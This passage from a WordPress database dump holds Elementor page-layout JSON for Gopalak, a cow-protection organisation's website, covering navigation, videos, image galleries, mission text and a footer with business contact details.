here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9329,1599,'_elementor_page_assets','a:0:{}'),(9331,1600,'_elementor_edit_mode','builder'),(9332,1600,'_elementor_template_type','wp-page'),(9333,1600,'_elementor_version','3.7.8'),(9334,1600,'_wp_page_template','elementor_canvas'),(9335,1600,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity 